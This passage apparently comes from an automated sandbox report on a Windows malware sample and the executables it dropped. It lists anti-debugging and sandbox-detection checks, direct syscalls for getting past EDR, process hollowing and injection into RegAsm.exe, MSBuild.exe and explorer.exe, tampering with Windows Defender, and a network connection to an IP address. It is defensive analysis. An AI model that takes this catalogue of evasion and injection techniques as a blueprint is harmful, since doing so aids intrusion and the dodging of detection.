\\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid linkpathlocationmac_addrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
Source: RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: swsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAccepted
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservi
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: ddrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.)
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: rayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\Def

Source: C:\Users\user\Documents\SimpleAdobe\Y8KGRj_sUjw5KjZpIoRDoSwV.exe	API call chain: ExitProcess graph end node	graph_11-6298
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	API call chain: ExitProcess graph end node	graph_12-87266
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	API call chain: ExitProcess graph end node	graph_12-87269
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	API call chain: ExitProcess graph end node	graph_12-88312
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	API call chain: ExitProcess graph end node	graph_12-87295
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	API call chain: ExitProcess graph end node	graph_12-87287
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	API call chain: ExitProcess graph end node	graph_12-87319
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	API call chain: ExitProcess graph end node	graph_12-87280

Source: C:\Users\user\Desktop\i1crvbOZAP.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe

System information queried: CodeIntegrityInformation

Hides threads from debuggers

Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	File opened: NTICE
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	File opened: SICE
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe	Process queried: DebugPort
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Process queried: DebugPort
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Process queried: DebugPort
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Process queried: DebugPort
Source: C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\i1crvbOZAP.exe

Code function: 0_2_00007FF64935D123 rdtsc

0_2_00007FF64935D123

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe

Code function: 12_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

12_2_00417B4E

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe

12_2_00416240

Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_00144100 mov eax, dword ptr fs:[00000030h]	5_2_00144100
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_003D7ED7 mov eax, dword ptr fs:[00000030h]	5_2_003D7ED7
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_003D7ED7 mov eax, dword ptr fs:[00000030h]	5_2_003D7ED7
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_003D7ED7 mov eax, dword ptr fs:[00000030h]	5_2_003D7ED7
Source: C:\Users\user\Documents\SimpleAdobe\uRWnWA7bjEhugCQgmREIdGsh.exe	Code function: 5_2_003D7ED7 mov eax, dword ptr fs:[00000030h]	5_2_003D7ED7
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_00415DC0 mov eax, dword ptr fs:[00000030h]	12_2_00415DC0

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe

Code function: 12_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

12_2_00404C70

Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_00419DC7 SetUnhandledExceptionFilter,	12_2_00419DC7
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00417B4E
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_004173DD
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658DB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_658DB66C
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658DB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_658DB1F7
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A8AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_65A8AC62

Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: wsjtivv.29.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 37.255.238.137 80

.NET source code references suspicious native API functions

Source: Start[1].exe.0.dr, Angelo.cs	Reference to suspicious API methods: Program.GetProcAddress(Program.LoadLibraryA(oKUPr9WaFOgmExoHS3.VV7KHHDdX(text, oKUPr9WaFOgmExoHS3.aSV8SsYNo)), "CreateThread")
Source: Start[1].exe.0.dr, Angelo.cs	Reference to suspicious API methods: Program.GetProcAddress(Program.LoadLibraryA(oKUPr9WaFOgmExoHS3.VV7KHHDdX(text, oKUPr9WaFOgmExoHS3.aSV8SsYNo)), "CreateThread")
Source: Start[1].exe.0.dr, Angelo.cs	Reference to suspicious API methods: Program.GetProcAddress(Program.LoadLibraryA((string)oOGJq51E5uCPx21pZ4o(text, oKUPr9WaFOgmExoHS3.aSV8SsYNo)), "VirtualProtectEx")

Allocates memory in foreign processes

Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe

Code function: 6_2_0268B4F9 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

6_2_0268B4F9

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe

Thread created: C:\Windows\explorer.exe EIP: 11D19D0

Disables Windows Defender (deletes autostart)

Source: C:\Users\user\Desktop\i1crvbOZAP.exe

Registry value deleted: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{DC325940-6FBF-42F0-8A46-E7E120706631}Machine\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware

Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	NtUnmapViewOfSection: Direct from: 0x140FC862F
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	NtSetInformationThread: Indirect: 0x7FF649785306	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	NtMapViewOfSection: Direct from: 0x140FE889D
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	NtProtectVirtualMemory: Direct from: 0x140FBCAC6
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	NtProtectVirtualMemory: Direct from: 0x1416CF1D1
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	NtProtectVirtualMemory: Direct from: 0x14102BFF1
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	NtProtectVirtualMemory: Indirect: 0x140F595B5
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	NtProtectVirtualMemory: Direct from: 0x141037F5D
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	NtProtectVirtualMemory: Direct from: 0x14100CB88
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	NtClose: Direct from: 0x141699636
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	NtProtectVirtualMemory: Direct from: 0x140F63C2D
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	NtProtectVirtualMemory: Direct from: 0x141019C6D
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	NtQueryInformationProcess: Indirect: 0x7FF649783134	Jump to behavior
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	NtQueryInformationProcess: Indirect: 0x7FF649783298	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	NtProtectVirtualMemory: Direct from: 0x1416AD85D
Source: C:\Users\user\Documents\SimpleAdobe\CQTbcHuZCBIaghzHIvMnZgpt.exe	NtOpenFile: Direct from: 0x141698803
Source: C:\Users\user\Desktop\i1crvbOZAP.exe	NtQuerySystemInformation: Indirect: 0x7FF649732EA4	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read

Sample uses process hollowing technique

Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Section unmapped: C:\Windows\SysWOW64\WerFault.exe base address: 400000			Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Section unmapped: unknown base address: 400000

Searches for specific processes (likely to inject)

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe

Code function: 12_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

12_2_00415D00

Writes to foreign memory regions

Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44E000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: EC2008	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 420000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63F000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 80C008	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 420000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63F000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BE4008	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 420000
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42B000
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 63E000
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 63F000
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: C70008

Source: C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\g1nHVnlr2tXTEWQsRz_M547D.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7632 -ip 7632	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OBGPQMHF"	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7624 -ip 7624
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7632 -ip 7632
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 7616 -ip 7616
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7632 -s 980
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\fSJI2dwukNtWVEjIwlXBl7N4.exe	Process created: unknown unknown

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe

